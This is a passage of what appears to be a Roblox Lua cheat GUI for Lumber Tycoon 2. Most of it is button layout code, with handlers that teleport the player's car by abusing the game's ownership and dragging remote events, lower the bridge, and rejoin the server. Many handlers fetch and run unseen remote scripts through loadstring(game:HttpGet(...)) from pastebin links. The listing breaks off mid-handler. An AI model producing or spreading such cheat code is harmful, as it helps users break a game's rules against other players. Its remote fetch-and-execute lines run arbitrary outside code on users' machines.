  4114. SpawnPointa.BackgroundColor3 = Color3.new(0, 0, 0)
  4115. SpawnPointa.BorderColor3 = Color3.new(0, 0, 0)
  4116. SpawnPointa.Position = UDim2.new(0, 3, 0, 3)
  4117. SpawnPointa.Size = UDim2.new(0, 165, 0, 20)
  4118. SpawnPointa.Font = Enum.Font.Fantasy
  4119. SpawnPointa.Text = "Spawn Point"
  4120. SpawnPointa.TextColor3 = Color3.new(255, 0, 0)
  4121. SpawnPointa.TextSize = 15
  4122.  
  4123. furnabox.Name = "furnabox"
  4124. furnabox.Parent = TpCarFrame
  4125. furnabox.BackgroundColor3 = Color3.new(0, 0, 0)
  4126. furnabox.BorderColor3 = Color3.new(0, 0, 0)
  4127. furnabox.Position = UDim2.new(0, 3, 0, 26)
  4128. furnabox.Size = UDim2.new(0, 165, 0, 20)
  4129. furnabox.Font = Enum.Font.Fantasy
  4130. furnabox.Text = "Box Cars + Furnishings"
  4131. furnabox.TextColor3 = Color3.new(255, 0, 0)
  4132. furnabox.TextSize = 15
  4133.  
  4134. LinkLogic.Name = "LinkLogic"
  4135. LinkLogic.Parent = TpCarFrame
  4136. LinkLogic.BackgroundColor3 = Color3.new(0, 0, 0)
  4137. LinkLogic.BorderColor3 = Color3.new(0, 0, 0)
  4138. LinkLogic.Position = UDim2.new(0, 3, 0, 49)
  4139. LinkLogic.Size = UDim2.new(0, 165, 0, 20)
  4140. LinkLogic.Font = Enum.Font.Fantasy
  4141. LinkLogic.Text = "Link's Logic"
  4142. LinkLogic.TextColor3 = Color3.new(255, 0, 0)
  4143. LinkLogic.TextSize = 15
  4144.  
  4145. Bshack.Name = "Bshack"
  4146. Bshack.Parent = TpCarFrame
  4147. Bshack.BackgroundColor3 = Color3.new(0, 0, 0)
  4148. Bshack.BorderColor3 = Color3.new(0, 0, 0)
  4149. Bshack.Position = UDim2.new(0, 3, 0, 72)
  4150. Bshack.Size = UDim2.new(0, 165, 0, 20)
  4151. Bshack.Font = Enum.Font.Fantasy
  4152. Bshack.Text = "Bob's Shack"
  4153. Bshack.TextColor3 = Color3.new(255, 0, 0)
  4154. Bshack.TextSize = 15
  4155.  
  4156. Docka.Name = "Docka"
  4157. Docka.Parent = TpCarFrame
  4158. Docka.BackgroundColor3 = Color3.new(0, 0, 0)
  4159. Docka.BorderColor3 = Color3.new(0, 0, 0)
  4160. Docka.Position = UDim2.new(0, 3, 0, 95)
  4161. Docka.Size = UDim2.new(0, 165, 0, 20)
  4162. Docka.Font = Enum.Font.Fantasy
  4163. Docka.Text = "Dock"
  4164. Docka.TextColor3 = Color3.new(255, 0, 0)
  4165. Docka.TextSize = 15
  4166.  
  4167. FineShop.Name = "FineShop"
  4168. FineShop.Parent = TpCarFrame
  4169. FineShop.BackgroundColor3 = Color3.new(0, 0, 0)
  4170. FineShop.BorderColor3 = Color3.new(0, 0, 0)
  4171. FineShop.Position = UDim2.new(0, 3, 0, 118)
  4172. FineShop.Size = UDim2.new(0, 165, 0, 20)
  4173. FineShop.Font = Enum.Font.Fantasy
  4174. FineShop.Text = "Fine Arts Shop"
  4175. FineShop.TextColor3 = Color3.new(255, 0, 0)
  4176. FineShop.TextSize = 15
  4177.  
  4178. Deny.Name = "Deny"
  4179. Deny.Parent = TpCarFrame
  4180. Deny.BackgroundColor3 = Color3.new(0, 0, 0)
  4181. Deny.BorderColor3 = Color3.new(0, 0, 0)
  4182. Deny.Position = UDim2.new(0, 3, 0, 141)
  4183. Deny.Size = UDim2.new(0, 165, 0, 20)
  4184. Deny.Font = Enum.Font.Fantasy
  4185. Deny.Text = "The Den"
  4186. Deny.TextColor3 = Color3.new(255, 0, 0)
  4187. Deny.TextSize = 15
  4188.  
  4189. OfSight.Name = "OfSight"
  4190. OfSight.Parent = TpCarFrame
  4191. OfSight.BackgroundColor3 = Color3.new(0, 0, 0)
  4192. OfSight.BorderColor3 = Color3.new(0, 0, 0)
  4193. OfSight.Position = UDim2.new(0, 3, 0, 164)
  4194. OfSight.Size = UDim2.new(0, 165, 0, 20)
  4195. OfSight.Font = Enum.Font.Fantasy
  4196. OfSight.Text = "Shrine Of Sight"
  4197. OfSight.TextColor3 = Color3.new(255, 0, 0)
  4198. OfSight.TextSize = 15
  4199.  
  4200. SKI.Name = "SKI"
  4201. SKI.Parent = TpCarFrame
  4202. SKI.BackgroundColor3 = Color3.new(0, 0, 0)
  4203. SKI.BorderColor3 = Color3.new(0, 0, 0)
  4204. SKI.Position = UDim2.new(0, 3, 0, 187)
  4205. SKI.Size = UDim2.new(0, 165, 0, 20)
  4206. SKI.Font = Enum.Font.Fantasy
  4207. SKI.Text = "Ski Lodge"
  4208. SKI.TextColor3 = Color3.new(255, 0, 0)
  4209. SKI.TextSize = 15
  4210.  
  4211. LightHouse.Name = "LightHouse"
  4212. LightHouse.Parent = TpCarFrame
  4213. LightHouse.BackgroundColor3 = Color3.new(0, 0, 0)
  4214. LightHouse.BorderColor3 = Color3.new(0, 0, 0)
  4215. LightHouse.Position = UDim2.new(0, 3, 0, 210)
  4216. LightHouse.Size = UDim2.new(0, 165, 0, 20)
  4217. LightHouse.Font = Enum.Font.Fantasy
  4218. LightHouse.Text = "Light House"
  4219. LightHouse.TextColor3 = Color3.new(255, 0, 0)
  4220. LightHouse.TextSize = 15
  4221.  
  4222. LavaTreeA.Name = "LavaTreeA"
  4223. LavaTreeA.Parent = TpCarFrame
  4224. LavaTreeA.BackgroundColor3 = Color3.new(0, 0, 0)
  4225. LavaTreeA.BorderColor3 = Color3.new(0, 0, 0)
  4226. LavaTreeA.Position = UDim2.new(0, 3, 0, 233)
  4227. LavaTreeA.Size = UDim2.new(0, 165, 0, 20)
  4228. LavaTreeA.Font = Enum.Font.Fantasy
  4229. LavaTreeA.Text = "Volcano"
  4230. LavaTreeA.TextColor3 = Color3.new(255, 0, 0)
  4231. LavaTreeA.TextSize = 15
  4232.  
  4233. PalmTreeA.Name = "PalmTreeA"
  4234. PalmTreeA.Parent = TpCarFrame
  4235. PalmTreeA.BackgroundColor3 = Color3.new(0, 0, 0)
  4236. PalmTreeA.BorderColor3 = Color3.new(0, 0, 0)
  4237. PalmTreeA.Position = UDim2.new(0, 3, 0, 256)
  4238. PalmTreeA.Size = UDim2.new(0, 165, 0, 20)
  4239. PalmTreeA.Font = Enum.Font.Fantasy
  4240. PalmTreeA.Text = "Palm Island"
  4241. PalmTreeA.TextColor3 = Color3.new(255, 0, 0)
  4242. PalmTreeA.TextSize = 15
  4243.  
  4244. SnowglowtreeA.Name = "SnowglowtreeA"
  4245. SnowglowtreeA.Parent = TpCarFrame
  4246. SnowglowtreeA.BackgroundColor3 = Color3.new(0, 0, 0)
  4247. SnowglowtreeA.BorderColor3 = Color3.new(0, 0, 0)
  4248. SnowglowtreeA.Position = UDim2.new(0, 3, 0, 279)
  4249. SnowglowtreeA.Size = UDim2.new(0, 165, 0, 20)
  4250. SnowglowtreeA.Font = Enum.Font.Fantasy
  4251. SnowglowtreeA.Text = "Snowglowd Island"
  4252. SnowglowtreeA.TextColor3 = Color3.new(255, 0, 0)
  4253. SnowglowtreeA.TextSize = 15
  4254.  
  4255. GoldTreeA.Name = "GoldTree"
  4256. GoldTreeA.Parent = TpCarFrame
  4257. GoldTreeA.BackgroundColor3 = Color3.new(0, 0, 0)
  4258. GoldTreeA.BorderColor3 = Color3.new(0, 0, 0)
  4259. GoldTreeA.Position = UDim2.new(0, 3, 0,302)
  4260. GoldTreeA.Size = UDim2.new(0, 165, 0, 20)
  4261. GoldTreeA.Font = Enum.Font.Fantasy
  4262. GoldTreeA.Text = "Swamp"
  4263. GoldTreeA.TextColor3 = Color3.new(255, 0, 0)
  4264. GoldTreeA.TextSize = 15
  4265.  
  4266.  
  4267. function TeleportCar(Pos)
  4268. if game.Players.LocalPlayer.Character then
  4269. Character = game.Players.LocalPlayer.Character
  4270. if Character.Humanoid.SeatPart ~= nil then
  4271. Car = Character.Humanoid.SeatPart.Parent
  4272. spawn(function()
  4273. for i=1,5 do
  4274. wait()
  4275. Car:SetPrimaryPartCFrame(Pos * CFrame.Angles(math.rad(Character.HumanoidRootPart.Orientation.x), math.rad(Character.HumanoidRootPart.Orientation.y), 0))
  4276. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Car.Main)
  4277. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Car.Main)
  4278. end
  4279. end)
  4280. end
  4281. end
  4282. end
  4283.  
  4284. SpawnPointa.MouseButton1Down:connect(function()
  4285. makesound("rbxassetid://156785206")
  4286. TeleportCar(CFrame.new(155, 3, 74))
  4287. end)
  4288.  
  4289. furnabox.MouseButton1Down:connect(function()
  4290. makesound("rbxassetid://156785206")
  4291. TeleportCar(CFrame.new(517, 3, -1607.1))
  4292. end)
  4293.  
  4294. LinkLogic.MouseButton1Down:connect(function()
  4295. makesound("rbxassetid://156785206")
  4296. TeleportCar(CFrame.new(4616.7, 3, -733.5))
  4297. end)
  4298.  
  4299. Bshack.MouseButton1Down:connect(function()
  4300. makesound("rbxassetid://156785206")
  4301. TeleportCar(CFrame.new(233.1, 7.8, -2536.2))
  4302. end)
  4303.  
  4304. Docka.MouseButton1Down:connect(function()
  4305. makesound("rbxassetid://156785206")
  4306. TeleportCar(CFrame.new(1087.2, -1.2, -189.7))
  4307. end)
  4308.  
  4309. FineShop.MouseButton1Down:connect(function()
  4310. makesound("rbxassetid://156785206")
  4311. TeleportCar(CFrame.new(5207, -166, 719))
  4312. end)
  4313.  
  4314. Deny.MouseButton1Down:connect(function()
  4315. makesound("rbxassetid://156785206")
  4316. TeleportCar(CFrame.new(327.4, 59.8, 1984.2))
  4317. end)
  4318.  
  4319. OfSight.MouseButton1Down:connect(function()
  4320. makesound("rbxassetid://156785206")
  4321. TeleportCar(CFrame.new(-1600, 205, 919))
  4322. end)
  4323.  
  4324. SKI.MouseButton1Down:connect(function()
  4325. makesound("rbxassetid://156785206")
  4326. TeleportCar(CFrame.new(1244.8, 59.8, 2278.3))
  4327. end)
  4328.  
  4329. LightHouse.MouseButton1Down:connect(function()
  4330. makesound("rbxassetid://156785206")
  4331. TeleportCar(CFrame.new(1488.1, 355.2, 3265))
  4332. end)
  4333.  
  4334. LavaTreeA.MouseButton1Down:connect(function()
  4335. makesound("rbxassetid://156785206")
  4336. TeleportCar(CFrame.new(-1584.4, 623, 1112.9))
  4337. end)
  4338.  
  4339. PalmTreeA.MouseButton1Down:connect(function()
  4340. makesound("rbxassetid://156785206")
  4341. TeleportCar(CFrame.new(4290.8, -5.9, -1794.2))
  4342. end)
  4343.  
  4344. SnowglowtreeA.MouseButton1Down:connect(function()
  4345. makesound("rbxassetid://156785206")
  4346. TeleportCar(CFrame.new(-1092.2, -5.9, -938.2))
  4347. end)
  4348.  
  4349. GoldTreeA.MouseButton1Down:connect(function()
  4350. makesound("rbxassetid://156785206")
  4351. TeleportCar(CFrame.new(-1231.8, 152.7, -540.3))
  4352. end)
  4353.  
  4354. CarRotate.Name = "CarRotate"
  4355. CarRotate.Parent = toolaFrame
  4356. CarRotate.BackgroundColor3 = Color3.new(0, 0, 0)
  4357. CarRotate.BorderColor3 = Color3.new(0, 0, 0)
  4358. CarRotate.Position = UDim2.new(0, 3, 0, 348)
  4359. CarRotate.Size = UDim2.new(0, 140, 0, 20)
  4360. CarRotate.Font = Enum.Font.Fantasy
  4361. CarRotate.FontSize = Enum.FontSize.Size18
  4362. CarRotate.Text = "Car Rotater"
  4363. CarRotate.TextColor3 = Color3.new(255, 0, 0)
  4364. CarRotate.TextSize = 15
  4365.  
  4366. CarRotates.Name = "CarRotates"
  4367. CarRotates.Parent = toolaFrame
  4368. CarRotates.BackgroundColor3 = Color3.new(0, 0, 0)
  4369. CarRotates.BorderColor3 = Color3.new(0, 0, 0)
  4370. CarRotates.Position = UDim2.new(0, 147, 0, 348)
  4371. CarRotates.Size = UDim2.new(0, 21, 0, 20)
  4372. CarRotates.Font = Enum.Font.Fantasy
  4373. CarRotates.FontSize = Enum.FontSize.Size18
  4374. CarRotates.Text = "R"
  4375. CarRotates.TextColor3 = Color3.new(255, 0, 0)
  4376. CarRotates.TextSize = 15
  4377.  
  4378. CarRotate.MouseButton1Click:connect(function()
  4379. makesound("rbxassetid://156785206")
  4380. local Turn = game:GetService("Players").LocalPlayer:GetMouse()
  4381. function Turn2(key)
  4382. if (key == "r") then
  4383. function RotateCar()
  4384. if game.Players.LocalPlayer.Character then
  4385. Character = game.Players.LocalPlayer.Character
  4386. if Character.Humanoid.SeatPart ~= nil then
  4387. Car = Character.Humanoid.SeatPart.Parent
  4388. spawn(function()
  4389. local Pos = CFrame.new(Car.Main.Position)
  4390. for i=1,5 do
  4391. wait()
  4392. Car:SetPrimaryPartCFrame(Pos * CFrame.Angles(math.rad(Character.HumanoidRootPart.Orientation.x), math.rad(Character.HumanoidRootPart.Orientation.y), 0))
  4393. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Car.Main)
  4394. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Car.Main)
  4395. end
  4396. end)
  4397. end
  4398. end
  4399. end
  4400. RotateCar()
  4401. end
  4402. end
  4403. Turn.KeyDown:connect(Turn2)
  4404. end)
  4405.  
  4406. Brid.Name = "Bridge"
  4407. Brid.Parent = toolaFrame
  4408. Brid.BackgroundColor3 = Color3.new(0, 0, 0)
  4409. Brid.BorderColor3 = Color3.new(0, 0, 0)
  4410. Brid.Position = UDim2.new(0, 3, 0, 371)
  4411. Brid.Size = UDim2.new(0, 115, 0, 20)
  4412. Brid.Font = Enum.Font.Fantasy
  4413. Brid.FontSize = Enum.FontSize.Size18
  4414. Brid.Text = "Bridge"
  4415. Brid.TextColor3 = Color3.new(255, 0, 0)
  4416. Brid.TextSize = 15
  4417.  
  4418. Bridup.Name = "Bridge"
  4419. Bridup.Parent = toolaFrame
  4420. Bridup.BackgroundColor3 = Color3.new(0, 0, 0)
  4421. Bridup.BorderColor3 = Color3.new(0, 0, 0)
  4422. Bridup.Position = UDim2.new(0, 147, 0, 371)
  4423. Bridup.Size = UDim2.new(0, 21, 0, 20)
  4424. Bridup.Font = Enum.Font.Fantasy
  4425. Bridup.FontSize = Enum.FontSize.Size18
  4426. Bridup.Text = "U"
  4427. Bridup.TextColor3 = Color3.new(255, 0, 0)
  4428. Bridup.TextSize = 15
  4429.  
  4430. BridDown.Name = "Bridge"
  4431. BridDown.Parent = toolaFrame
  4432. BridDown.BackgroundColor3 = Color3.new(0, 0, 0)
  4433. BridDown.BorderColor3 = Color3.new(0, 0, 0)
  4434. BridDown.Position = UDim2.new(0, 122, 0, 371)
  4435. BridDown.Size = UDim2.new(0, 21, 0, 20)
  4436. BridDown.Font = Enum.Font.Fantasy
  4437. BridDown.FontSize = Enum.FontSize.Size18
  4438. BridDown.Text = "D"
  4439. BridDown.TextColor3 = Color3.new(255, 0, 0)
  4440. BridDown.TextSize = 15
  4441.  
  4442. local BridgeD = false
  4443. BridDown.MouseButton1Click:connect(function()
  4444. makesound("rbxassetid://156785206")
  4445. if BridgeD == false then
  4446. for _,v in pairs(game.workspace.Bridge.VerticalLiftBridge.Lift:GetChildren()) do
  4447. v.CFrame = v.CFrame + Vector3.new(0, -26, 0)
  4448. end
  4449. BridgeD = true
  4450. end
  4451. end)
  4452.  
  4453. Bridup.MouseButton1Click:connect(function()
  4454. makesound("rbxassetid://156785206")
  4455. if BridgeD == true then
  4456.  
  4457. for _,v in pairs(game.workspace.Bridge.VerticalLiftBridge.Lift:GetChildren()) do
  4458. v.CFrame = v.CFrame + Vector3.new(0, 26, 0)
  4459. end
  4460. BridgeD = false
  4461. end
  4462. end)
  4463.  
  4464.  
  4465. ReJoinServer.Name = "ReJoinServer"
  4466. ReJoinServer.Parent = toolaFrame
  4467. ReJoinServer.BackgroundColor3 = Color3.new(0, 0, 0)
  4468. ReJoinServer.BorderColor3 = Color3.new(0, 0, 0)
  4469. ReJoinServer.Position = UDim2.new(0, 3, 0, 394)
  4470. ReJoinServer.Size = UDim2.new(0, 165, 0, 20)
  4471. ReJoinServer.Font = Enum.Font.Fantasy
  4472. ReJoinServer.FontSize = Enum.FontSize.Size18
  4473. ReJoinServer.Text = "ReJoin Server"
  4474. ReJoinServer.TextColor3 = Color3.new(255, 0, 0)
  4475. ReJoinServer.TextSize = 15
  4476. ReJoinServer.MouseButton1Down:connect(function()
  4477. makesound("rbxassetid://156785206")
  4478. local placeId = "13822889"
  4479. game:GetService("TeleportService"):Teleport(placeId)
  4480. end)
  4481.  
  4482. Reset.Name = "Reset"
  4483. Reset.Parent = toolaFrame
  4484. Reset.BackgroundColor3 = Color3.new(0, 0, 0)
  4485. Reset.BorderColor3 = Color3.new(0, 0, 0)
  4486. Reset.Position = UDim2.new(0, 3, 0, 417)
  4487. Reset.Size = UDim2.new(0, 165, 0, 20)
  4488. Reset.Font = Enum.Font.Fantasy
  4489. Reset.FontSize = Enum.FontSize.Size18
  4490. Reset.Text = "Reset Character"
  4491. Reset.TextColor3 = Color3.new(255, 0, 0)
  4492. Reset.TextSize = 15
  4493. Reset.MouseButton1Click:connect(function()
  4494. makesound("rbxassetid://156785206")
  4495. game.Players.LocalPlayer.Character.Head:Destroy()
  4496. end)
  4497.  
  4498. Buymenu.Name = "Buymenu"
  4499. Buymenu.Parent = Picker
  4500. Buymenu.BackgroundColor3 = Color3.new(1, 1, 1)
  4501. Buymenu.BorderColor3 = Color3.new(0, 0, 0)
  4502. Buymenu.Position = UDim2.new(0, 15, 0,515)
  4503. Buymenu.Size = UDim2.new(0, 80, 0, 80)
  4504. Buymenu.ZIndex = 3
  4505. Buymenu.Image = "rbxassetid://3936608288"
  4506. Buymenu.ScaleType = Enum.ScaleType.Crop
  4507. Buymenu.MouseButton1Click:Connect(function()
  4508. CurrentItem.Image = "rbxassetid://3886256996"
  4509. makesound("rbxassetid://156785206")
  4510. AIntroImage.Visible = true
  4511. AIntroImage1.Visible = true
  4512. end)
  4513.  
  4514. BuyFrame.Name = "BuyFrame"
  4515. BuyFrame.Parent = MenuFrame
  4516. BuyFrame.BorderSizePixel = 1
  4517. BuyFrame.BackgroundTransparency = 0
  4518. BuyFrame.BorderColor3 = Color3.new(0, 0, 0)
  4519. BuyFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  4520. BuyFrame.Size = UDim2.new(0, 170, 0, 141)
  4521. BuyFrame.Visible = false
  4522.  
  4523. wrus.Name = "wrus"
  4524. wrus.Parent = BuyFrame
  4525. wrus.BackgroundColor3 = Color3.new(0, 0, 0)
  4526. wrus.BorderColor3 = Color3.new(0, 0, 0)
  4527. wrus.Position = UDim2.new(0, 3, 0, 3)
  4528. wrus.Size = UDim2.new(0, 164, 0, 20)
  4529. wrus.Font = Enum.Font.Fantasy
  4530. wrus.FontSize = Enum.FontSize.Size18
  4531. wrus.Text = "Wod R Us"
  4532. wrus.TextColor3 = Color3.new(255, 0, 0)
  4533. wrus.TextSize = 15
  4534. wrus.MouseButton1Click:connect(function()
  4535. makesound("rbxassetid://156785206")
  4536. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4537. wait(2.5)
  4538. MainFrame.Visible = false
  4539. OpenFrame.Visible = true
  4540. loadstring(game:HttpGet('https://pastebin.com/raw/zqpfJ5ef',true))()
  4541. end)
  4542.  
  4543. fshop.Name = "fshop"
  4544. fshop.Parent = BuyFrame
  4545. fshop.BackgroundColor3 = Color3.new(0, 0, 0)
  4546. fshop.BorderColor3 = Color3.new(0, 0, 0)
  4547. fshop.Position = UDim2.new(0, 3, 0, 26)
  4548. fshop.Size = UDim2.new(0, 164, 0, 20)
  4549. fshop.Font = Enum.Font.Fantasy
  4550. fshop.FontSize = Enum.FontSize.Size18
  4551. fshop.Text = "Furniture Store"
  4552. fshop.TextColor3 = Color3.new(255, 0, 0)
  4553. fshop.TextSize = 15
  4554. fshop.MouseButton1Click:connect(function()
  4555. makesound("rbxassetid://156785206")
  4556. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4557. wait(2.5)
  4558. MainFrame.Visible = false
  4559. OpenFrame.Visible = true
  4560. loadstring(game:HttpGet('https://pastebin.com/raw/kkvhSQqm',true))()
  4561. end)
  4562.  
  4563. bcps.Name = "bcps"
  4564. bcps.Parent = BuyFrame
  4565. bcps.BackgroundColor3 = Color3.new(0, 0, 0)
  4566. bcps.BorderColor3 = Color3.new(0, 0, 0)
  4567. bcps.Position = UDim2.new(0, 3, 0, 49)
  4568. bcps.Size = UDim2.new(0, 164, 0, 20)
  4569. bcps.Font = Enum.Font.Fantasy
  4570. bcps.FontSize = Enum.FontSize.Size18
  4571. bcps.Text = "Bobs, Car, Pics"
  4572. bcps.TextColor3 = Color3.new(255, 0, 0)
  4573. bcps.TextSize = 15
  4574. bcps.MouseButton1Click:connect(function()
  4575. makesound("rbxassetid://156785206")
  4576. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4577. wait(2.5)
  4578. MainFrame.Visible = false
  4579. OpenFrame.Visible = true
  4580. loadstring(game:HttpGet('https://pastebin.com/raw/Ss7D3Uxj',true))()
  4581. end)
  4582.  
  4583. ls.Name = "ls"
  4584. ls.Parent = BuyFrame
  4585. ls.BackgroundColor3 = Color3.new(0, 0, 0)
  4586. ls.BorderColor3 = Color3.new(0, 0, 0)
  4587. ls.Position = UDim2.new(0, 3, 0, 72)
  4588. ls.Size = UDim2.new(0, 164, 0, 20)
  4589. ls.Font = Enum.Font.Fantasy
  4590. ls.FontSize = Enum.FontSize.Size18
  4591. ls.Text = "Logic Store"
  4592. ls.TextColor3 = Color3.new(255, 0, 0)
  4593. ls.TextSize = 15
  4594. ls.MouseButton1Click:connect(function()
  4595. makesound("rbxassetid://156785206")
  4596. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4597. wait(2.5)
  4598. MainFrame.Visible = false
  4599. OpenFrame.Visible = true
  4600. loadstring(game:HttpGet('https://pastebin.com/raw/zWgwSGj6',true))()
  4601. end)
  4602.  
  4603. bp.Name = "bp"
  4604. bp.Parent = BuyFrame
  4605. bp.BackgroundColor3 = Color3.new(0, 0, 0)
  4606. bp.BorderColor3 = Color3.new(0, 0, 0)
  4607. bp.Position = UDim2.new(0, 3, 0, 95)
  4608. bp.Size = UDim2.new(0, 164, 0, 20)
  4609. bp.Font = Enum.Font.Fantasy
  4610. bp.FontSize = Enum.FontSize.Size18
  4611. bp.Text = "Blue Prints"
  4612. bp.TextColor3 = Color3.new(255, 0, 0)
  4613. bp.TextSize = 15
  4614. bp.MouseButton1Click:connect(function()
  4615. makesound("rbxassetid://156785206")
  4616. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4617. wait(2.5)
  4618. MainFrame.Visible = false
  4619. OpenFrame.Visible = true
  4620. loadstring(game:HttpGet('https://pastebin.com/raw/5HaFXJqZ',true))()
  4621. end)
  4622.  
  4623. Halloween.Name = "Halloween"
  4624. Halloween.Parent = BuyFrame
  4625. Halloween.BackgroundColor3 = Color3.new(0, 0, 0)
  4626. Halloween.BorderColor3 = Color3.new(0, 0, 0)
  4627. Halloween.Position = UDim2.new(0, 3, 0, 118)
  4628. Halloween.Size = UDim2.new(0, 164, 0, 20)
  4629. Halloween.Font = Enum.Font.Fantasy
  4630. Halloween.FontSize = Enum.FontSize.Size18
  4631. Halloween.Text = "Halloween"
  4632. Halloween.TextColor3 = Color3.new(255, 0, 0)
  4633. Halloween.TextSize = 15
  4634. Halloween.MouseButton1Click:connect(function()
  4635. makesound("rbxassetid://156785206")
  4636. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4637. wait(2.5)
  4638. MainFrame.Visible = false
  4639. OpenFrame.Visible = true
  4640. loadstring(game:HttpGet('https://pastebin.com/raw/aj3n8VDw',true))()
  4641. end)
  4642.  
  4643. Btoolamenu.Name = "Btoolamenu"
  4644. Btoolamenu.Parent = Picker
  4645. Btoolamenu.BackgroundColor3 = Color3.new(1, 1, 1)
  4646. Btoolamenu.BorderColor3 = Color3.new(0, 0, 0)
  4647. Btoolamenu.Position = UDim2.new(0, 15, 0,600)
  4648. Btoolamenu.Size = UDim2.new(0, 80, 0, 80)
  4649. Btoolamenu.ZIndex = 3
  4650. Btoolamenu.Image = "rbxassetid://3953123880"
  4651. Btoolamenu.ScaleType = Enum.ScaleType.Crop
  4652. CurrentItem.Image = "rbxassetid://3886256996"
  4653. Btoolamenu.MouseButton1Click:Connect(function()
  4654. makesound("rbxassetid://156785206")
  4655. end)
  4656.  
  4657. LT2GUI2Frame.Name = "LT2GUI2Frame"
  4658. LT2GUI2Frame.Parent = MenuFrame
  4659. LT2GUI2Frame.BorderSizePixel = 1
  4660. LT2GUI2Frame.BackgroundTransparency = 0
  4661. LT2GUI2Frame.BorderColor3 = Color3.new(0, 0, 0)
  4662. LT2GUI2Frame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  4663. LT2GUI2Frame.Size = UDim2.new(0, 170, 0, 255)
  4664. LT2GUI2Frame.Visible = false
  4665.  
  4666. FunStuffHOVER.Name = "FunStuffHOVER"
  4667. FunStuffHOVER.Parent = LT2GUI2Frame
  4668. FunStuffHOVER.BackgroundColor3 = Color3.new(0, 0, 0)
  4669. FunStuffHOVER.BorderColor3 = Color3.new(0, 0, 0)
  4670. FunStuffHOVER.Position = UDim2.new(0, 3, 0, 3)
  4671. FunStuffHOVER.Size = UDim2.new(0, 165, 0, 20)
  4672. FunStuffHOVER.Font = Enum.Font.Fantasy
  4673. FunStuffHOVER.FontSize = Enum.FontSize.Size18
  4674. FunStuffHOVER.Text = "Hover Board"
  4675. FunStuffHOVER.TextColor3 = Color3.new(255, 0, 0)
  4676. FunStuffHOVER.TextSize = 15
  4677. FunStuffHOVER.MouseButton1Click:connect(function()
  4678. makesound("rbxassetid://156785206")
  4679. loadstring(game:HttpGet('https://pastebin.com/raw/DabYym5D',true))()
  4680.  
  4681. end)
  4682.  
  4683. FunStuffTHOMAS.Name = "FunStuffTHOMAS"
  4684. FunStuffTHOMAS.Parent = LT2GUI2Frame
  4685. FunStuffTHOMAS.BackgroundColor3 = Color3.new(0, 0, 0)
  4686. FunStuffTHOMAS.BorderColor3 = Color3.new(0, 0, 0)
  4687. FunStuffTHOMAS.Position = UDim2.new(0, 3, 0, 26)
  4688. FunStuffTHOMAS.Size = UDim2.new(0, 165, 0, 20)
  4689. FunStuffTHOMAS.Font = Enum.Font.Fantasy
  4690. FunStuffTHOMAS.FontSize = Enum.FontSize.Size18
  4691. FunStuffTHOMAS.Text = "Thomas The Tank"
  4692. FunStuffTHOMAS.TextColor3 = Color3.new(255, 0, 0)
  4693. FunStuffTHOMAS.TextSize = 15
  4694. FunStuffTHOMAS.MouseButton1Click:connect(function()
  4695. makesound("rbxassetid://156785206")
  4696. loadstring(game:HttpGet('http://pastebin.com/raw/tMr759X7',true))()
  4697.  
  4698. end)
  4699.  
  4700. FunStuffPOLICE.Name = "FunStuffPOLICE"
  4701. FunStuffPOLICE.Parent = LT2GUI2Frame
  4702. FunStuffPOLICE.BackgroundColor3 = Color3.new(0, 0, 0)
  4703. FunStuffPOLICE.BorderColor3 = Color3.new(0, 0, 0)
  4704. FunStuffPOLICE.Position = UDim2.new(0, 3, 0, 49)
  4705. FunStuffPOLICE.Size = UDim2.new(0, 165, 0, 20)
  4706. FunStuffPOLICE.Font = Enum.Font.Fantasy
  4707. FunStuffPOLICE.FontSize = Enum.FontSize.Size18
  4708. FunStuffPOLICE.Text = "Police Man"
  4709. FunStuffPOLICE.TextColor3 = Color3.new(255, 0, 0)
  4710. FunStuffPOLICE.TextSize = 15
  4711. FunStuffPOLICE.MouseButton1Click:connect(function()
  4712. makesound("rbxassetid://156785206")
  4713. loadstring(game:HttpGet('https://pastebin.com/raw/FR9Fzcqw',true))()
  4714.  
  4715. end)
  4716.  
  4717. FunStuffSPRAY.Name = "FunStuffSPRAY"
  4718. FunStuffSPRAY.Parent = LT2GUI2Frame
  4719. FunStuffSPRAY.BackgroundColor3 = Color3.new(0, 0, 0)
  4720. FunStuffSPRAY.BorderColor3 = Color3.new(0, 0, 0)
  4721. FunStuffSPRAY.Position = UDim2.new(0, 3, 0, 72)
  4722. FunStuffSPRAY.Size = UDim2.new(0, 165, 0, 20)
  4723. FunStuffSPRAY.Font = Enum.Font.Fantasy
  4724. FunStuffSPRAY.FontSize = Enum.FontSize.Size18
  4725. FunStuffSPRAY.Text = "Spray Can"
  4726. FunStuffSPRAY.TextColor3 = Color3.new(255, 0, 0)
  4727. FunStuffSPRAY.TextSize = 15
  4728. FunStuffSPRAY.MouseButton1Click:connect(function()
  4729. makesound("rbxassetid://156785206")
  4730. loadstring(game:HttpGet('http://pastebin.com/raw/raYkCjyy',true))()
  4731.  
  4732. end)
  4733.  
  4734. FunStuffCOCA.Name = "FunStuffCOCA"
  4735. FunStuffCOCA.Parent = LT2GUI2Frame
  4736. FunStuffCOCA.BackgroundColor3 = Color3.new(0, 0, 0)
  4737. FunStuffCOCA.BorderColor3 = Color3.new(0, 0, 0)
  4738. FunStuffCOCA.Position = UDim2.new(0, 3, 0, 95)
  4739. FunStuffCOCA.Size = UDim2.new(0, 165, 0, 20)
  4740. FunStuffCOCA.Font = Enum.Font.Fantasy
  4741. FunStuffCOCA.FontSize = Enum.FontSize.Size18
  4742. FunStuffCOCA.Text = "Coca Cola"
  4743. FunStuffCOCA.TextColor3 = Color3.new(255, 0, 0)
  4744. FunStuffCOCA.TextSize = 15
  4745. FunStuffCOCA.MouseButton1Click:connect(function()
  4746. makesound("rbxassetid://156785206")
